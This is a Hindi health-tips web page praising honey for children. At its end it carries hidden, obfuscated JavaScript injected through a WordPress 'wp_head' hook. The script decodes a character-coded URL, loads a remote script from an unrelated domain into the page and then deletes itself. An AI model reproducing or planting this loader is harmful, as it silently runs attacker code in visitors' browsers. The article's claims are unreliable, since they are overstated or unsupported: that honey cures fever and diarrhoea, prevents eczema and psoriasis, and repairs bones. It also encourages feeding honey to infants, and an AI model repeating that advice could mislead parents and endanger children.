Tuesday, June 25, 2024
spot_img

हेल्थ टिप्स : बच्चों को शहद खिलाने के फायदे

हेल्थ टिप्स ::- शिशु को बचपन में कैसा खानपान मिलता है इस पर उसका आगे का स्वास्थ्य निर्भर करता है। बचपन में शहद चटाना बच्चों की सेहत के लिए बहुत लाभदायक है। छोटे बच्चों को शहद चटाने से उनकी कई समस्याएं दूर रहती हैं। बचपन के खानपान से उनकी इम्युनिटी मजबूत होने लगती है। शहद में पावरफुल एंटी-ऑक्सीडेंट होते हैं।

बचपन से शहद खाने से इम्युनिटी मजबूत होती है। शहद में दमदार एंटी-ऑक्सीडेंट होते हैं जो बच्चे की सेहत के लिए काफी गुणकारी होता है। लेकिन आपको बच्चे को शहद खिलाते वक्त कई बातों का ध्यान रखने की भी जरूरत है।

मजबूत इम्युनिटी- शहद में पोलिफेनोल्स जैसे एंटीऑक्सीडेंट होते हैं। ये एंटीऑक्सीडेंट्स बच्चों की इम्युनिटी बढ़ाने में मदद करते हैं।

कब्ज दूर- शहद में कई तरह के एंटीबैक्टीरियल और एंटी-फंगल गुण होते हैं। अगर बच्चे को कब्ज की समस्या रहती है तो शहद चटाने से इसे दूर कर सकते हैं। शहद से बच्चों में कई तरह की पेट की समस्याएं जैसे बुखार, दस्त और कब्ज भी दूर होती हैं

1 वर्ष या इससे अधिक उम्र के बच्चों को समय पर शहद खिलाने से त्वचा से जुड़ी समस्याएं जैसे एक्जिमा या सोरायसिस नहीं होता है। इसके अलावा भी शहद चटाने से स्वास्थ्य को कई फायदे होते हैं।

हड्ड‍ियों को मजबूत बनाए रखने के लिए भी दूध के साथ शहद का सेवन करना फायदेमंद होता है। इसका सेवन करने से हड्डियों में अगर कोई नुकसान हुआ हो तो उसकी भी भरपाई होती रहती है।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>